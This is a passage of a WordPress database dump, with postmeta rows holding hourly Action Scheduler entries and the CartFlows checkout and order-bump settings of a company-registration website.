49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565962452;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19494,32874,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565962452;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19495,32875,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565966349;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19496,32876,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565966349;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19497,32877,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565970622;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19498,32878,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565970622;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19499,32879,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565974961;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19500,32880,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565974961;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19501,32881,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565978865;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19502,32882,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565978865;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19503,32883,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565982985;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19504,32884,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565982985;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19505,32885,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565986741;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19506,32886,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565986741;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19507,32887,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565991527;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19508,32888,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565991527;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19509,32889,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565996648;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19510,32890,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565996649;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19511,32891,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566000362;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19512,32892,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566000362;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19513,32893,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566004075;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19514,32894,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566004075;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19515,32895,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566009477;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19516,32896,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566009477;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19517,32897,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566013374;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19518,32898,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566013374;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19519,32899,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566017245;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19520,32900,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566017245;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19521,32901,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566021177;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19522,32902,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566021177;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19523,32903,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566025476;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19524,32904,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566025476;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19525,32905,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566030553;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19526,32906,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566030553;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19527,32907,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566035296;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19528,32908,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566035296;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19529,32909,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566039449;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19530,32910,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566039450;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19531,32911,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566043590;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19532,32912,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566043590;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19533,32913,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566047851;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19534,32914,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566047851;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19535,32915,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566051471;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19536,32916,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566051471;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19537,32917,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566056797;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19538,32918,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566056797;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19539,32919,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566060786;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19540,32920,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566060786;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19541,32921,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566064565;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19542,32922,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566064565;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19543,32923,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566068830;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19544,32924,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566068830;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19545,32925,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566072625;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19546,32926,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566072625;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19547,32927,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566077020;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19548,32928,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566077020;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19549,32929,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566081286;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19550,32930,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566081286;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19551,32931,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566085434;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19552,32932,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566085434;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19553,32933,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566089759;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19554,32934,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566089759;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19555,32935,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566094345;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19556,32936,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566094345;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19557,32937,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566100285;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19558,32938,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566100285;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19559,32939,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566110261;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19560,32940,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566110262;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19561,32941,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566118727;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19562,32942,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566118727;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19624,33002,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566243244;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19747,33131,'wcf-shipping_city','no'),(19748,33131,'wcf-shipping_state','no'),(19749,33131,'wcf-shipping_postcode','no'),(19750,33131,'wcf-shipping_country','no'),(19751,33131,'wcf-shipping_address_1','no'),(19752,33131,'wcf-shipping_address_2','no'),(19753,33131,'wcf-bump-border-color','#ff4800'),(19754,33131,'wcf-bump-border-style','inherit'),(19755,33131,'wcf-bump-bg-color','#ffffff'),(19756,33131,'wcf-show-coupon-field','no'),(19757,33131,'wcf-checkout-additional-fields','no'),(19758,33131,'wcf-custom-checkout-fields','yes'),(19759,33131,'wcf-shipto-diff-addr-fields','no'),(19760,33131,'wcf-billing_first_name','yes'),(19761,33131,'wcf-billing_last_name','yes'),(19762,33131,'wcf-billing_company','no'),(19763,33131,'wcf-billing_country','no'),(19764,33131,'wcf-billing_address_1','no'),(19765,33131,'wcf-billing_address_2','no'),(19766,33131,'wcf-billing_city','no'),(19767,33131,'wcf-billing_state','no'),(19768,33131,'wcf-billing_postcode','no'),(19769,33131,'wcf-billing_phone','no'),(19770,33131,'wcf-billing_email','no'),(19771,33131,'wcf-shipping_first_name','no'),(19772,33131,'wcf-shipping_last_name','no'),(19773,33131,'wcf-shipping_company','no'),(19774,33131,'wcf-order-bump-desc','S50(1) Every company must-\r\n(a)establish or cause to be established a register of its issued securities in the prescribed form; and\r\n(b)maintain its securities register in accordance with the prescribed standards.'),(19775,33131,'wcf-order-bump-position','after-order'),(19776,33131,'wcf-order-bump-label','Yes, I will take it! For R75'),(19777,33131,'wcf-order-bump-hl-text','Company Law Requirement'),(19778,33131,'wcf-submit-color','#ffffff'),(19779,33131,'wcf-submit-hover-color','#ffffff'),(19780,33131,'wcf-submit-bg-color','#242f6b'),(19781,33131,'wcf-submit-bg-hover-color','#242f6b'),(19782,33131,'wcf-submit-border-color','#242f6b'),(19783,33131,'wcf-submit-border-hover-color','#242f6b'),(19784,33131,'wcf-active-tab','wcf-product-order-bump'),(19785,33131,'wcf-enable-product-options','no'),(19786,33131,'wcf-product-options','force-all'),(19787,33131,'wcf-enable-product-variation','no'),(19788,33131,'wcf-product-variation-options','inline'),(19789,33131,'wcf-enable-product-quantity','no'),(19790,33131,'wcf-order-bump-style','style-2'),(19791,33131,'wcf-order-bump','yes'),(19792,33131,'wcf-field-label-color','#404040'),(19793,33131,'wcf-input-button-size','33px'),(19794,33131,'wcf-input-field-size','33px'),(19795,33131,'wcf-field-color','#555555'),(19796,33131,'wcf-field-bg-color','#ffffff'),(19797,33131,'wcf-field-border-color','#d4d4d4'),(19798,33131,'wcf-input-font-weight','100'),(19799,33131,'wcf-heading-font-family','\'Roboto\', sans-serif'),(19800,33131,'wcf-heading-font-weight','100'),(19801,33131,'wcf-base-font-family','\'Roboto\', sans-serif'),(19802,33131,'wcf-advance-options-fields','no'),(19803,33131,'wcf-button-font-family','\'Roboto\', sans-serif'),(19804,33131,'wcf-button-font-weight','100'),(19805,33131,'wcf-primary-color','#242f6b'),(19806,33131,'wcf-heading-color','#404040'),(19807,33131,'wcf-fields-skins','style-one'),(19808,33131,'wcf-checkout-layout','one-column'),(19809,33131,'wcf-input-font-family','\'Roboto\', sans-serif'),(19810,33131,'_wp_page_template','cartflows-canvas'),(19811,33131,'_et_pb_post_hide_nav','default'),(19812,33131,'_et_pb_page_layout','et_right_sidebar'),(19813,33131,'wcf-field-google-font-url','//fonts.googleapis.com/css?family=Roboto|Roboto:100|Roboto:100|Roboto:100'),(19814,33131,'_et_pb_side_nav','off'),(19815,33131,'_et_pb_use_builder','on'),(19816,33131,'wcf_fields_shipping','a:9:{s:19:\"shipping_first_name\";a:5:{s:5:\"label\";s:10:\"First name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:14:\"form-row-first\";}s:12:\"autocomplete\";s:10:\"given-name\";s:8:\"priority\";i:10;}s:18:\"shipping_last_name\";a:5:{s:5:\"label\";s:9:\"Last name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:13:\"form-row-last\";}s:12:\"autocomplete\";s:11:\"family-name\";s:8:\"priority\";i:20;}s:16:\"shipping_company\";a:5:{s:5:\"label\";s:12:\"Company name\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:12:\"autocomplete\";s:12:\"organization\";s:8:\"priority\";i:30;s:8:\"required\";b:0;}s:16:\"shipping_country\";a:6:{s:4:\"type\";s:7:\"country\";s:5:\"label\";s:7:\"Country\";s:8:\"required\";b:1;s:5:\"class\";a:3:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";i:2;s:23:\"update_totals_on_change\";}s:12:\"autocomplete\";s:7:\"country\";s:8:\"priority\";i:40;}s:18:\"shipping_address_1\";a:6:{s:5:\"label\";s:14:\"Street address\";s:11:\"placeholder\";s:28:\"House number and street name\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line1\";s:8:\"priority\";i:50;}s:18:\"shipping_address_2\";a:7:{s:5:\"label\";s:27:\"Apartment, suite, unit etc.\";s:11:\"label_class\";a:1:{i:0;s:18:\"screen-reader-text\";}s:11:\"placeholder\";s:38:\"Apartment, suite, unit etc. (optional)\";s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line2\";s:8:\"priority\";i:60;s:8:\"required\";b:0;}s:13:\"shipping_city\";a:5:{s:5:\"label\";s:11:\"Town / City\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:14:\"address-level2\";s:8:\"priority\";i:70;}s:14:\"shipping_state\";a:8:{s:4:\"type\";s:5:\"state\";s:5:\"label\";s:5:\"State\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:5:\"state\";}s:12:\"autocomplete\";s:14:\"address-level1\";s:8:\"priority\";i:80;s:13:\"country_field\";s:16:\"shipping_country\";}s:17:\"shipping_postcode\";a:6:{s:5:\"label\";s:3:\"ZIP\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:8:\"postcode\";}s:12:\"autocomplete\";s:11:\"postal-code\";s:8:\"priority\";i:90;}}'),(19817,33131,'wcf-header-logo-image',''),(19818,33131,'wcf-header-logo-width',''),(19819,33131,'wcf-custom-script',''),(19820,33131,'wcf-product-opt-title','Your Products'),(19821,33131,'wcf-checkout-discount-coupon','a:1:{i:0;s:9:\"regmeless\";}'),(19822,33131,'wcf-order-bump-image','https://companyregistration.online/wp-content/uploads/2019/07/company-register-1.gif'),(19823,33131,'cartflows_imported_step','yes'),(19824,33131,'wcf_fields_billing','a:11:{s:18:\"billing_first_name\";a:5:{s:5:\"label\";s:10:\"First name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:14:\"form-row-first\";}s:12:\"autocomplete\";s:10:\"given-name\";s:8:\"priority\";i:10;}s:17:\"billing_last_name\";a:5:{s:5:\"label\";s:9:\"Last name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:13:\"form-row-last\";}s:12:\"autocomplete\";s:11:\"family-name\";s:8:\"priority\";i:20;}s:15:\"billing_company\";a:5:{s:5:\"label\";s:12:\"Company name\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:12:\"autocomplete\";s:12:\"organization\";s:8:\"priority\";i:30;s:8:\"required\";b:0;}s:15:\"billing_country\";a:6:{s:4:\"type\";s:7:\"country\";s:5:\"label\";s:7:\"Country\";s:8:\"required\";b:1;s:5:\"class\";a:3:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";i:2;s:23:\"update_totals_on_change\";}s:12:\"autocomplete\";s:7:\"country\";s:8:\"priority\";i:40;}s:17:\"billing_address_1\";a:6:{s:5:\"label\";s:14:\"Street address\";s:11:\"placeholder\";s:28:\"House number and street name\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line1\";s:8:\"priority\";i:50;}s:17:\"billing_address_2\";a:7:{s:5:\"label\";s:27:\"Apartment, suite, unit etc.\";s:11:\"label_class\";a:1:{i:0;s:18:\"screen-reader-text\";}s:11:\"placeholder\";s:38:\"Apartment, suite, unit etc. (optional)\";s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line2\";s:8:\"priority\";i:60;s:8:\"required\";b:0;}s:12:\"billing_city\";a:5:{s:5:\"label\";s:11:\"Town / City\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:14:\"address-level2\";s:8:\"priority\";i:70;}s:13:\"billing_state\";a:8:{s:4:\"type\";s:5:\"state\";s:5:\"label\";s:5:\"State\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:5:\"state\";}s:12:\"autocomplete\";s:14:\"address-level1\";s:8:\"priority\";i:80;s:13:\"country_field\";s:15:\"billing_country\";}s:16:\"billing_postcode\";a:6:{s:5:\"label\";s:3:\"ZIP\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:8:\"postcode\";}s:12:\"autocomplete\";s:11:\"postal-code\";s:8:\"priority\";i:90;}s:13:\"billing_phone\";a:7:{s:5:\"label\";s:5:\"Phone\";s:8:\"required\";b:1;s:4:\"type\";s:3:\"tel\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:8:\"validate\";a:1:{i:0;s:5:\"phone\";}s:12:\"autocomplete\";s:3:\"tel\";s:8:\"priority\";i:100;}s:13:\"billing_email\";a:7:{s:5:\"label\";s:13:\"Email address\";s:8:\"required\";b:1;s:4:\"type\";s:5:\"email\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:8:\"validate\";a:1:{i:0;s:5:\"email\";}s:12:\"autocomplete\";s:14:\"email username\";s:8:\"priority\";i:110;}}'),(19825,33131,'wcf-checkout-products','a:1:{i:0;a:1:{s:7:\"product\";s:2:\"28\";}}'),(19826,33131,'wcf-base-font-weight',''),(19827,33131,'wcf-section-bg-color',''),(19828,33131,'wcf-hl-bg-color',''),(19829,33131,'wcf-field-tb-padding',''),(19830,33131,'wcf-field-lr-padding',''),(19831,33131,'wcf-box-border-color',''),(19832,33131,'wcf-submit-tb-padding',''),(19833,33131,'wcf-submit-lr-padding',''),(19834,33131,'wcf-order-bump-product','a:1:{i:0;s:5:\"31327\";}'),(19835,33131,'wcf-order-bump-discount',''),(19836,33131,'wcf-order-bump-discount-value',''),(19837,33131,'wcf-bump-label-color',''),(19838,33131,'wcf-bump-label-bg-color',''),(19839,33131,'wcf-bump-desc-text-color',''),(19840,33131,'wcf-bump-hl-text-color',''),(19841,33131,'wcf-bump-hl-bg-color',''),(19842,33131,'wcf-bump-hl-tb-padding',''),(19843,33131,'wcf-bump-hl-lr-padding',''),(19844,33131,'wcf_field_order_billing','a:11:{s:18:\"billing_first_name\";a:8:{s:5:\"lab